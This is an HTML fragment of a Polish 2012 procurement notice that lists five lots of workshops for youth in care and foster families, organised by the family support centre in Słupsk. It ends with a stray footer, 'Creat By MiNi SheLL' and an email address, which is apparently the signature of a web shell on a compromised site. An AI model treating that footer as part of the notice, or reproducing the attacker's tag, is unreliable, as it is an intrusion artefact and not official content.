<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warsztat kompetencji społecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztat jest skierowany do 12 wychowanków placówki opiekuńczo-wychowawczej w wieku 15-25 lat.
Celem warsztatów jest wzrost kompetencji społecznych uczestników, tj. nabycie umiejętności zachowania asertywnego, poprawa komunikacji interpersonalnej i zweryfikowanie u uczestników wiedzy na temat roli kobiety i mężczyzny w rodzinie, stereotypów dotyczących płci oraz możliwości rozwiązywania konfliktów rodzinnych.
Zamówienie realizowane będzie z wykorzystaniem zagadnień z zakresu edukacji psychospołecznej, w tym: trening integracyjny, asertywności, komunikacji interpersonalnej, rozwiązywanie konfliktów, sztuka współpracy i kompromisów, pełnienie ról matki - ojca, żony - męża, z czego min 80% czasu trwania warsztatów przeprowadzić należy za pomocą aktywnych metod pracy z grupą, tj.: ćwiczenia twórcze, scenki rodzajowe, gry, dyskusja.
Zamówienie realizowane będzie w jednej grupie 12- osobowej w łącznej ilości 12 godzin lekcyjnych.
Termin realizacji części I -  do końca czerwca 2012r. w godzinach popołudniowych (dokładny terminarz spotkań ustalony zostanie z Wykonawcą na etapie podpisywania umowy).
Miejsce realizacji zamówienia: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20 (zapewnienie sali szkoleniowej, materiałów biurowych niezbędnych do przeprowadzenia warsztatu, poczęstunku oraz poniesienie kosztów związanych z dojazdem uczestników na spotkania leży po stronie Zamawiającego).
Wykonawca zobowiązany jest do: 
- zapewnienia materiałów szkoleniowych dla każdego uczestnika projektu (w tym jeden dodatkowy do dokumentacji projektowej),             
- zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć,
- oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warsztat savoir - vivre - dobre obyczaje otwierają drzwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztat jest skierowany do 12 wychowanków placówki opiekuńczo-wychowawczej w wieku 15-25 lat.
Celem warsztatów jest przyswojenie podstawowych zasad dobrego wychowania, nauka dobrych manier, nabycie umiejętności zachowania się przy stole, w teatrze i kinie, dobór odpowiedniego stroju na ważne okazje. Warsztat zakończy się praktycznym wykorzystaniem wiedzy podczas wyjścia do teatru i restauracji.
Zamówienie realizowane będzie w dwóch etapach: 
- I etap - część teoretyczna w ilości 12 godzin lekcyjnych, w tym 80% czasu trwania warsztatów przeprowadzić należy za pomocą aktywnych metod pracy z grupą, tj.: scenki rodzajowe, ćwiczenia itp. 
- II etap -  część praktyczna w ilości około 5 godzin zegarowych, tj. wyjście do teatru i restauracji w Słupsku.
Termin realizacji części II - do końca lipca 2012r., w tym:
- etap I: spotkania od poniedziałku do piątku w godzinach popołudniowych (dokładny terminarz spotkań ustalony zostanie z Wykonawcą na etapie podpisywania umowy);  
- etap II odbędzie się w sobotę - dokładna godzina spotkania uzależniona będzie od repertuaru spektakli w teatrze.
Miejsce realizacji zamówienia: 
-etap I - siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20 ;
-etap II - teatr i restauracja na terenie Słupska 
Zapewnienie sali szkoleniowej, materiałów biurowych niezbędnych do przeprowadzenia warsztatu, poczęstunku, poniesienie kosztów związanych z dojazdem uczestników na spotkania, zakup biletów na spektakl do teatru dla uczestników projektu, dwóch opiekunów  oraz trenera, jak również pokrycie kosztów zamówionych posiłków w restauracji dla ww. osób leży po stronie Zamawiającego.
Wykonawca zobowiązany jest do:
- zapewnienia materiałów szkoleniowych dla każdego uczestnika projektu (w tym jeden dodatkowy do dokumentacji projektowej),
- zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć,
- oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warsztat na temat kreowania własnego wizerunku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztat jest skierowany do 8 wychowanków rodzin zastępczych w wieku 17-21 lat.
Celem warsztatów jest wzrost umiejętności pozytywnego kreowania własnego wizerunku, poznanie zasad dobierania ubioru i dbania o higienę, jednym z elementów warsztatu będzie autoprezentacja uczestników.
Zamówienie realizowane będzie w łącznej ilości 9 godzin lekcyjnych, w tym min 80% czasu trwania warsztatów przeprowadzić należy za pomocą aktywnych metod pracy z grupą, tj.: ćwiczenia twórcze, dyskusja na temat kreowania wizerunku, tego jak jesteśmy postrzegani przez innych, co wpływa na kształtowanie się opinii, kiedy ludzie kierują się stereotypami itp. 
Udział w zajęciach warsztatowych weźmie 8 uczestników projektu i ich najbliższe otoczenie (max 8 osób, jeżeli będzie taka potrzeba ze strony uczestników projektu).
Termin realizacji części III - do końca czerwca 2012r. w godzinach popołudniowych (dokładny terminarz spotkań ustalony zostanie z Wykonawcą na etapie podpisywania umowy).
Miejsce realizacji zamówienia: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20 (zapewnienie sali szkoleniowej, materiałów biurowych niezbędnych do przeprowadzenia warsztatu, poczęstunku oraz poniesienie kosztów związanych z dojazdem uczestników na spotkania leży po stronie Zamawiającego).
Wykonawca zobowiązany jest do:
- zapewnienia materiałów szkoleniowych dla 8 uczestników projektu oraz jeden dodatkowy do dokumentacji projektowej
- zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć,
- oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warsztat przedsiębiorczości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztat jest skierowany do 8 wychowanków rodzin zastępczych w wieku 17-21 lat.
Celem warsztatów jest kształtowanie postaw samodzielności uczestników, wzrost umiejętności podejmowania samodzielnych decyzji życiowych i inicjatyw, rozwianie obaw uczestników związanych  z wejściem w dorosłe życie oraz wzmocnienie w uczestnikach wiary we własne możliwości, a także wyposażenie uczestników w wiedzę na temat różnych instytucji świadczących pomoc, np. w uzyskaniu zatrudnienia, mieszkania itp.
Zamówienie realizowane będzie w łącznej ilości 15 godzin lekcyjnych, w tym min 80% czasu trwania warsztatów przeprowadzić należy za pomocą aktywnych metod pracy z grupą, tj.: ćwiczenia twórcze, scenki rodzajowe, gry. 
Udział w zajęciach warsztatowych weźmie 8 uczestników projektu i ich najbliższe otoczenie (max 8 osób, jeżeli będzie taka potrzeba ze strony uczestników projektu).
Termin realizacji części IV - do końca sierpnia 2012r. w godzinach popołudniowych (dokładny terminarz spotkań ustalony zostanie z Wykonawcą na etapie podpisywania umowy).
Miejsce realizacji zamówienia: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20 (zapewnienie sali szkoleniowej, materiałów biurowych niezbędnych do przeprowadzenia warsztatu, poczęstunku oraz poniesienie kosztów związanych z dojazdem uczestników na spotkania leży po stronie Zamawiającego).
Wykonawca zobowiązany jest do: 
-  zapewnienia materiałów szkoleniowych dla 8 uczestników projektu oraz jeden dodatkowy do dokumentacji projektowej,
- zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć,
- oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Warsztat Szkoła rodzica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie realizowane będzie w dwóch etapach:
Etap I: zajęcia warsztatowe skierowane do 15 rodziców zastępczych.
Celem warsztatów jest wzrost kompetencji społecznych i wychowawczych uczestników, tj. poprawa komunikacji w rodzinie, nawiązanie głębszych relacji z dziećmi, nabycie umiejętności radzenia sobie ze stresem, rozwiązywania konfliktów rodzinnych i pokonywania trudności w sytuacjach kryzysowych, a także uświadomienie uczestnikom istoty współpracy z rodziną biologiczną dziecka oraz właściwej roli kobiety i mężczyzny w rodzinie.
Zamówienie realizowane będzie z wykorzystaniem:  treningu z komunikacji w rodzinie, metod radzenia sobie ze stresem, rozwiązywania konfliktów rodzinnych, zagadnień dotyczących sztuki współpracy i kompromisów oraz roli kobiety i mężczyzny w rodzinie, w łącznej ilości 12 godzin lekcyjnych, z czego min 80% czasu trwania warsztatów przeprowadzić należy za pomocą aktywnych metod pracy z grupą, tj.: ćwiczenia twórcze, scenki rodzajowe, gry, dyskusja itp.
Miejsce realizacji zamówienia: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20 (zapewnienie sali szkoleniowej, materiałów biurowych niezbędnych do przeprowadzenia warsztatu, poczęstunku oraz poniesienie kosztów związanych z dojazdem uczestników na spotkania leży po stronie Zamawiającego).
Wykonawca zobowiązany jest do: 
-zapewnienia materiałów szkoleniowych dla każdego uczestnika projektu (w tym jeden dodatkowy do dokumentacji projektowej),
-zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć, 
-oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013;
Etap II: 2-dniowy pobyt rodziców zastępczych i ich dzieci w Karwnie, gdzie mieści się Wioska fantazji. 
W tym etapie udział weźmie 15 rodzin zastępczych, tj. uczestnicy projektu, ich małżonkowie i dzieci. Przewiduje się, iż udział w wyjeździe weźmie nie więcej niż 55 osób, jednak dokładna ilość osób zostanie wskazana na etapie realizacji zamówienia (w momencie zawierania umowy z Wykonawcą).
Celem  wyjazdu jest większa integracja członków rodzin poprzez różne formy aktywnego spędzania czasu: m.in. gry terenowe i zabawy integracyjno - animacyjne, które będą również sprzyjać pogłębieniu więzi emocjonalnych. W programie warsztatów należy uwzględnić zajęcia o charakterze integracyjno - animacyjnym, w tym zajęcia bębniarskie, kuglarskie, żonglerki, zabawy z chustą Klanzy, taniec hula.
Miejsce realizacji zamówienia:  Karwno (gmina Czarna Dąbrówka, woj. pomorskie)-Wioska fantazji.
Zamawiający zapewnia uczestnikom projektu, ich rodzinom oraz 2 opiekunom (koordynator projektu i pracownik socjalny): transport ze Słupska do Karwna i z Karwna do Słupska, wyżywienie, nocleg.
Wykonawca zobowiązany jest do:
-przeprowadzenia zajęć w Wiosce fantazji w Karwnie, tj. w sobotę od godziny 10.00 do godz. 18.30, w tym 2-godzinna przerwa obiadowa i dwie przerwy 15-minutowe kawowe - łącznie 8 godz. dydaktycznych zajęć, oraz w niedzielę od godziny 10.00 do godz.14.15, w tym 2 przerwy 15-minutowe kawowe - 5 godzin dydaktycznych zajęć. W programie warsztatów należy uwzględnić zajęcia o charakterze integracyjno - animacyjnym, w tym zajęcia bębniarskie, kuglarskie, żonglerki, zabawy z chustą Klanzy, taniec hula.
-zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć,
-oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013
Termin realizacji części V:
-etap I do końca czerwca 2012 r., spotkania odbędą się od poniedziałku do piątku w godzinach popołudniowych (dokładny terminarz spotkań ustalony zostanie z Wykonawcą na etapie podpisywania umowy);
-etap II do końca czerwca 2012 r., - pobyt w Karwnie w czasie weekendu, od soboty do niedzieli z noclegiem; planowany przyjazd do Karwna w sobotę: godz. 09.00; planowany wyjazd z Karwna w niedzielę: godz. 16.00  (dokładny terminarz spotkań ustalony zostanie z Wykonawcą na etapie podpisywania umowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com